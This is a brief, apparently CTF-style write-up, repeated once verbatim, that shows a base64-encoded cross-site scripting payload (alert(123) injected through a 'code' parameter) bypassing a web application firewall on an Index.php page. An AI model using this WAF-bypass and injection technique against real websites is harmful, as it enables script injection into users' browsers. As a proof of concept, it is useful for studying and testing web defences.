Get the base64 encode parameter in Index.php, which can successfully bypass the WAF and cause it to be rendered on the page.
payload: a=";alert(123);"&b=";alert(123);"
We need to base64 encode the payload as a parameter.
/?code=YT0iO2FsZXJ0KDEyMyk7IiZiPSI7YWxlcnQoMTIzKTsi
Get the base64 encode parameter in Index.php, which can successfully bypass the WAF and cause it to be rendered on the page. payload: a=";alert(123);"&b=";alert(123);" We need to base64 encode the payload as a parameter. /?code=YT0iO2FsZXJ0KDEyMyk7IiZiPSI7YWxlcnQoMTIzKTsi